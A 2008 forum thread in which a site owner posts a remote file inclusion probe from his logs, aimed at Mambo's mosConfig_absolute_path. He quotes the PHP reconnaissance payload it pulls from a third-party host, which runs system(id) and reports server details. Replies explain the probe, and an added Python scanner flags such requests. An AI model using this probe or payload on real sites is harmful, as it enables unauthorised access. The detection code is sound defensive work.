n8w, posted June 18, 2008

Here is a 404 I received

Page Requested: www.n8w.com//pear/PEAR/Frontend/CLI.php.php?mosConfig_absolute_path=http://web2.mars52.plusserver.de/contenido44/kurz/js/helpid.txt???

When I checked out the page it has this ... what is the hacker actually trying to do?

```php
<?php
function ConvertBytes($number)
{
    $len = strlen($number);
    if($len < 4) { return sprintf("%d b", $number); }
    if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
    if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
```

Jabop, posted June 18, 2008

People try to do these types of 'hacks' a lot. A lot of CMS have had exploits that script kiddies think they can exploit, but have been fixed. I don't think it's something you should worry about.

rarebit, posted June 18, 2008

After putting the var into google and php.net, it turns out to be something to do with the mambo cms, see http://www.google.co.uk/search?q=mosConfig_absolute_path&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

When an exploit like this is made known, hackers will fire it at many sites just in case they use the specified software and have the unpatched version...

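The request in the first post carries a remote URL as the value of `mosConfig_absolute_path`, the kind of probe rarebit describes being fired at many sites. As an added example that is not part of the thread, this Python function flags such requests in an access log; the log lines, IP addresses and the `remote.example` host are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines (combined log format assumed); not from the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jun/2008:10:12:01 +0000] "GET //pear/PEAR/Frontend/CLI.php.php'
    '?mosConfig_absolute_path=http://remote.example/helpid.txt??? HTTP/1.1" 404 512',
    '198.51.100.4 - - [18/Jun/2008:10:12:05 +0000] "GET /search.php?q=php+tutorials HTTP/1.1" 200 2048',
    '203.0.113.7 - - [18/Jun/2008:10:12:09 +0000] "GET /index.php'
    '?mosConfig_absolute_path=http%253A%252F%252Fremote.example%252Fhelpid.txt HTTP/1.1" 200 4096',
]

# Client IP, request target and status; the remaining fields are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the signature of a remote-include probe.
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)


def find_rfi_probes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        query = m.group("target").partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoded values.
            decoded = unquote(value).strip()
            if REMOTE_RE.match(decoded):
                findings.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "remote": decoded,
                    "status": int(m.group("status")),
                    # 404 means the targeted script does not exist on this site;
                    # any other status means the request reached a real script.
                    "reached_script": m.group("status") != "404",
                })
    return findings


if __name__ == "__main__":
    for finding in find_rfi_probes(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry URLs, such as redirect targets, also match, so hits are leads for review; a hit with `reached_script` set is the one to look at first.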
n8w, posted June 18, 2008

ahh ... what is the best way to avoid hacks? my site recently was hacked to pieces ... I am working on a sanitizing function and magic_quotes for sql injection .. but I am wondering if I should use something like http://htmlpurifier.org/comparison.html or if that is overkill? cause ideally I would like to avoid using 3rd party stuff

rarebit, posted June 18, 2008

it all depends upon what your site does...

n8w, posted June 18, 2008

well ... it mainly serves as a link portal with a searchable database and a way to upload images

Jabop, posted June 18, 2008

> ahh ... what is the best way to avoid hacks?

Keep your software up to date. That's all.